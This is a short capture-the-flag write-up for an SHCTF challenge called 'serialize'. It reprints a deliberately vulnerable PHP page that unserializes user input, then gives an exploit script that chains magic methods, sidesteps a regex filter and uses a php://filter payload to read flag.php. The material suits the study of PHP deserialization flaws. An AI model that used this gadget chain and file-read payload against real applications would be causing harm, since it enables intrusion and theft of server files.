SHCTF
serialize
<?php
highlight_file(__FILE__);
class misca{
public $gao;
public $fei;
public $a;
public function __get($key){
$this->miaomiao();
$this->gao=$this->fei;
die($this->a);
}
public function miaomiao(){
$this->a='Mikey Mouse~';
}
}
class musca{
public $ding;
public $dong;
public function __wakeup(){
return $this->ding->dong;
}
}
class milaoshu{
public $v;
public function __tostring(){
echo"misca~musca~milaoshu~~~";
include($this->v);
}
}
function check($data){
if(preg_match('/^O:\d+/',$data)){
die("you should think harder!");
}
else return $data;
}
unserialize(check($_GET["wanna_fl.ag"]));
exp:
<?php
class misca{
public $gao;
public $fei;
public $a;
}
class musca{
public $ding;
public $dong;
}
class milaoshu{
public $v;
}
$c=new musca();
$c->ding=new misca();
$c->ding->fei=new milaoshu();
$c->ding->gao = &($c->ding)-> a;
$c->ding->fei->v="php://filter/convert.base64-encode/resource=flag.php";
echo serialize(array($c));
?>
“有人见星辰,有人见尘埃”